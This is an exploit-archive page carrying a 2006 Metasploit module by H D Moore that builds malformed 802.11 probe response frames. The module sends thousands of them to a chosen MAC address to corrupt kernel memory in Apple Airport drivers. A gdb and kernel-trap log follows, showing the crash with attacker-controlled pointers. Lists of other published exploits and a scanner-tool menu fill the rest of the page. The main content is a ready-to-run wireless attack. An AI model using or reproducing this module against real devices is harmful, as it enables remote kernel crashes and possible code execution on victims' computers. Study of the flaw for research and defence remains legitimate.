"Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)"

Author

Exploit author

"H D Moore"

Platform

Exploit platform

hardware

Release date

Exploit published date

2006-11-01

                
                    
                         Download file
                    
                
            
# A proof-of-concept exploit has been added to the Metasploit Framework 3.0 source tree:
# msf > use auxiliary/dos/wireless/daringphucball

require 'msf/core'

module Msf

class Auxiliary::Dos::Wireless::DaringPhucball < Msf::Auxiliary

	include Exploit::Lorcon


	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption',
			'Description'    => %q{
				The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs)
				is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning 
				mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading
				to arbitrary code execution. This vulnerability is triggered when a probe response frame is received
				that does not contain valid information element (IE) fields after the fixed-length header. The data 
				following the fixed-length header is copied over internal kernel structures, resulting in memory 
				operations being performed on attacker-controlled pointer values.
			},
			
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 3666 $'
		))
		register_options(
			[
				OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
				OptString.new('ADDR_DST', [ true,  "The MAC address of the target system"])
			], self.class)					
	end

	#
	# This bug is easiest to trigger when the card has been placed into active scan mode:
	# $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s -r 10000
	#

	def run
		open_wifi
		
		cnt = datastore['COUNT'].to_i

		print_status("Creating malicious probe response frame...")		
		frame = create_frame()
		
		print_status("Sending #{cnt} frames...")
		0.upto(cnt) { |i| wifi.write(frame)	}
	end
	
	def eton(addr)
		addr.split(':').map { |c| c.hex.chr }.join
	end

	def create_frame
		bssid    = Rex::Text.rand_text(6)
		seq      = [rand(255)].pack('n')
		caps     = [rand(65535)].pack('n')
		
		frame = 
			"\x50" +                      # type/subtype
			"\x00" +                      # flags
			"\x00\x00" +                  # duration  
			eton(datastore['ADDR_DST']) + # dst
			bssid +                       # src
			bssid +                       # bssid
			seq   +                       # seq  
			Rex::Text.rand_text(8) +      # timestamp value
			Rex::Text.rand_text(2) +      # beacon interval
			Rex::Text.rand_text(2)        # capabilities
		
		frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4)
		
		return frame

	end	
end
end	

=begin

Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, 2006)

Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260
Latest crash info for cpu 0:
   Exception state (sv=0x3AA12A00)
      PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access)
      Backtrace:
0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94
         0x002CFA5C 0x000A9314
      Kernel loadable modules in backtrace (with dependencies):
         com.apple.driver.AppleAirPort(3.4.4)@0x797000
            dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000
Proceeding back via exception chain:
   Exception state (sv=0x3AA12A00)
      previously dumped as "Latest" state. skipping...
   Exception state (sv=0x31F13A00)
      PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown)

Kernel version:
Darwin Kernel Version 8.8.0: Fri Sep  8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC



(gdb) showcurrentstacks
task        vm_map      ipc_space  #acts   pid  proc        command
0x01a73dd8  0x00cdaf3c  0x01a68ef0   38      0  0x003fb200  kernel_task
            activation  thread      pri  state  wait_queue  wait_event
            0x01a7c000  0x01a7c000   82  R
                reserved_stack=0x173b0000
                kernel_stack=0x17440000
                stacktop=0x17443b60
                0x17443b60  0x1bc80ac
                0x17443be0  0x7a1d48 <com.apple.driver.AppleAirPort + 0xad48>
                0x17443c60  0x79fa54 <com.apple.driver.AppleAirPort + 0x8a54>
                0x17443ce0  0x79ff94 <com.apple.driver.AppleAirPort + 0x8f94>
                0x17443d90  0x79febc <com.apple.driver.AppleAirPort + 0x8ebc>
                0x17443df0  0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184>
                0x17443e40  0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104>
                0x17443e90  0xa9314 <Call_continuation+20>
                stackbottom=0x17443e90


(gdb) x/3i $pc
0x7a2260 <mhp.1762+3571640>:    lbz     r8,0(r2)
0x7a2264 <mhp.1762+3571644>:    addi    r2,r2,1
0x7a2268 <mhp.1762+3571648>:    stw     r2,0(r11)

(gdb) i r $r2
r2             0xdefacf7        233811191

(gdb) x/x $r11
0x17443bb8:     0x0defacf7


(gdb) bt
#0  0x007a2260 in mhp.1762 ()
#1  0x007a1d48 in mhp.1762 ()
warning: Previous frame identical to this frame (corrupt stack?)
#2  0x007a1d48 in mhp.1762 ()
#3  0x0079fa54 in mhp.1762 ()
#4  0x0079ff94 in mhp.1762 ()
#5  0x0079febc in mhp.1762 ()
#6  0x002d0b94 in IOInterruptEventSource::checkForWork (this=0x1d80d40) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOInterruptEventSource.cpp:196
#7  0x002cfa5c in IOWorkLoop::threadMain (this=0x1d803c0) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOWorkLoop.cpp:267


(gdb) x/40x $r1
0x17443b60:     0x17443be0      0x22424022      0x01bc80ac      0x00000038
0x17443b70:     0x00d43c54      0x0004ffff      0x01bc81f4      0x00000210
0x17443b80:     0x02275000      0x003d8000      0x004fa418      0x00365000
0x17443b90:     0x01d803c0      0x00033e88      0x01a7c01c      0x01a7c0a4
0x17443ba0:     0x0defaced      0x01bc8000      0x0227581e      0x0defacf7
0x17443bb0:     0x00000000      0x0227581e      0x0defacf7      0x00000001
0x17443bc0:     0x00000002      0x01bc81f4      0x00000000      0x00000000
0x17443bd0:     0x17443c10      0x01a858c0      0x17443be0      0x01d80d40
0x17443be0:     0x17443c60      0x01bc81f4      0x007a1d48      0x00000000
0x17443bf0:     0x17443c20      0x00008088      0x01bc8000      0x0227581e

=end

# milw0rm.com [2006-11-01]

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-11-30	"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure"	webapps	hardware	"Zagros Bingol"
2020-11-30	"Intelbras Router RF 301K 1.1.2 - Authentication Bypass"	webapps	hardware	"Kaio Amaral"
2020-11-27	"Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution"	webapps	hardware	"Emre SUREN"
2020-11-24	"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)"	webapps	hardware	maj0rmil4d
2020-11-23	"TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass"	webapps	hardware	malwrforensics
2020-11-19	"Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification"	webapps	hardware	"Ricardo Longatto"
2020-11-19	"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure"	remote	hardware	"Nitesh Surana"
2020-11-16	"Cisco 7937G - DoS/Privilege Escalation"	remote	hardware	"Cody Martin"
2020-11-13	"ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)"	webapps	hardware	b1ack0wl
2020-11-13	"Citrix ADC NetScaler - Local File Inclusion (Metasploit)"	webapps	hardware	"RAMELLA Sebastien"

Release Date	Title	Type	Platform	Author
2009-11-12	"Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)"	dos	windows	"H D Moore"
2009-10-30	"Nagios3 - 'statuswml.cgi' Command Injection (Metasploit)"	webapps	unix	"H D Moore"
2009-07-20	"DD-WRT HTTP v24-SP1 - Command Injection"	remote	linux	"H D Moore"
2007-04-23	"Apple QuickTime for Java 7 - Memory Access (Metasploit)"	remote	multiple	"H D Moore"
2006-11-13	"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)"	remote	windows	"H D Moore"
2006-11-13	"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)"	remote	windows	"H D Moore"
2006-11-01	"Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)"	dos	hardware	"H D Moore"
2006-09-27	"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)"	remote	windows	"H D Moore"
2006-08-10	"Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)"	remote	windows	"H D Moore"
2006-08-10	"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)"	remote	windows	"H D Moore"
2006-07-28	"Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution"	remote	multiple	"H D Moore"
2006-07-25	"Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)"	remote	multiple	"H D Moore"
2006-07-14	"Mozilla Firefox 3.5 - escape Memory Corruption (Metasploit)"	remote	multiple	"H D Moore"
2006-07-07	"Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow"	dos	windows	"H D Moore"
2006-06-22	"Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)"	remote	windows	"H D Moore"
2006-05-15	"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)"	remote	multiple	"H D Moore"
2006-04-15	"Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)"	remote	novell	"H D Moore"
2006-03-30	"PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)"	remote	windows	"H D Moore"
2006-03-20	"X.Org X11 (X11R6.9.0/X11R7.0) - Local Privilege Escalation"	local	linux	"H D Moore"
2006-03-01	"Apple Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)"	remote	osx	"H D Moore"
2006-02-28	"Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote (Metasploit)"	remote	windows	"H D Moore"
2006-02-22	"Apple Mac OSX Safari Browser - 'Safe File' Remote Code Execution (Metasploit)"	remote	osx	"H D Moore"
2006-02-17	"Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)"	remote	windows	"H D Moore"
2006-02-08	"Mozilla Firefox 1.5 (OSX) - 'location.QueryInterface()' Code Execution (Metasploit)"	remote	osx	"H D Moore"
2006-02-07	"Mozilla Firefox 1.5 (Linux) - 'location.QueryInterface()' Code Execution (Metasploit)"	remote	linux	"H D Moore"
2006-01-31	"Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)"	remote	windows	"H D Moore"
2005-12-27	"Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)"	remote	windows	"H D Moore"
2005-12-09	"Lyris ListManager - Read Message Attachment SQL Injection (Metasploit)"	remote	windows	"H D Moore"
2005-11-20	"Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)"	remote	hardware	"H D Moore"
2005-10-19	"CA Unicenter 3.1 - CAM 'log_security()' Remote Stack Overflow (Metasploit)"	remote	windows	"H D Moore"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.